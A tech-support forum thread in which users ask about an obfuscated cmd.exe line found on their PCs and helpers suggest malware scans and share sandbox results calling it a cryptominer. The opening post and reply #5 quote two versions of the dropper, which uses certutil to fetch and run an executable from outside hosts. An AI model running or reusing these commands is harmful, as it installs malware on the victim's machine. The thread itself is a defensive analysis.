Looks like a virus??

June 28, 2020 at 11:16:26
Specs: Windows 10
I found this bit of code that targets the cmd.exe
i have a feeling it allows someone access to your pc but im not sure:
%ComSpec% /v:on/c(SET bMbca=certutil -urlcache -f https://&SET kIJK=/?LnoKIKMOM6899bbfhJfgPiTV99fiKr7t=lessees_%PROCESSOR_ARCHITECTURE% !E0!&SET E0="%USERNAME%.exe"&IF NOT EXIST !E0! (!bMbca!izub.fun!kIJK!||!bMbca!de.charineziv.com!kIJK!&!E0!))>nul 2>&1

See More: Looks like a virus??

Reply ↓  Report •

#1
June 28, 2020 at 16:09:42
Here are the first 2 steps, more steps may be needed, after I see the results of these logs.

Step 1: Run AdwCleaner
https://www.softpedia.com/get/Antiv...
https://www.bleepingcomputer.com/do...
https://www.malwarebytes.com/adwcle...
https://toolslib.net/downloads/view...
Close all open programs and internet browsers.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click Scan Now
Click on Quarantine for all it finds.
Reboot.
Please Copy & Paste the contents of that logfile with your next reply.
https://i.imgur.com/qERgl4y.gif

Step 2: Run Malwarebytes Anti-Malware ( MBAM ) Use Threat Scan. Make sure Rootkit scan is on.
https://www.softpedia.com/get/Antiv...
https://www.freewarefiles.com/Malwa...
https://www.freewarefiles.com/scree...
https://www.malwarebytes.org/downlo...
Forum
https://www.malwarebytes.org/forums/
Scanning, you will get something like this.
https://i.imgur.com/4NZ5Qw0.gif
https://i.imgur.com/rRfr1oD.gif
https://i.imgur.com/tShE6tQ.gif
https://i.imgur.com/iJZHDC0.gif
After a restart ( if required ) Copy & Paste the contents of the scan into your reply.
If too large, upload to a site of your choosing.
Follow these directions, until you get to Export.
https://support.malwarebytes.com/hc...

message edited by Johnw


Reply ↓  Report •

#2
June 28, 2020 at 22:12:14
I took this code from your post and i modify some instructions inside in order to just download the suspect file and without execution it of course , and i upload it on https://www.virustotal.com
It looks like as a miner.

NB : I renamed it as Suspect.exe

https://www.virustotal.com/gui/file...

and i upload it too on https://www.hybrid-analysis.com/

The result is here :
https://www.hybrid-analysis.com/sam...


Reply ↓  Report •

#3
July 1, 2020 at 11:37:27
Hi, can you explain what this code does? I have found it on a users PC and trying to understand it. How can you tell if it’s been run?

Reply ↓  Report •

Related Solutions

#4
July 1, 2020 at 12:16:43
@Isolation
You can give a try for my batch to check if there is something suspect running or not !
Just copy and paste this code on your Notepad as Processes_Services_Tasks_Startup.bat
And after scan the batch create a LogFile.


Reply ↓  Report •

#5
July 6, 2020 at 00:16:16
Hi Hackoo - can you do the same for this code? Wondering if its same payload

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1


Thank you!


Reply ↓  Report •

#6
July 6, 2020 at 15:22:06
@coyotez2020
Risk Assessment
Remote Access
Reads terminal service related keys (often RDP related)
Fingerprint
Queries kernel debugger information
Reads the active computer name
Reads the cryptographic machine GUID
Evasive
The input sample contains a known anti-VM trick
Tries to sleep for a long time (more than two minutes)
Network Behavior
Contacts 2 domains and 1 host.

Overview
https://www.hybrid-analysis.com/sam...

Details :
https://www.hybrid-analysis.com/sam...



Reply ↓  Report •

#7
July 6, 2020 at 16:00:52
Thank you so much Hackoo! I feel better it doesn't appear to be ransomware, more bitcoin mining I guess. Can I safely download that .exe so I can submit it to an AV vendor for proper identification/removal? I didn't see an option on the Hybrid site to just re-DL it (phew). I don't see any suspicious netstat traffic and it would be hard coded for those destination IPs/Ports huh? I also ran your Processes_Services_Tasks_Startup.bat tool and didn't see anything glaring as supicious. I'm just not sure next best step, I kind of feel it failed to install. Thx again

message edited by coyotez2020


Reply ↓  Report •

Ask Question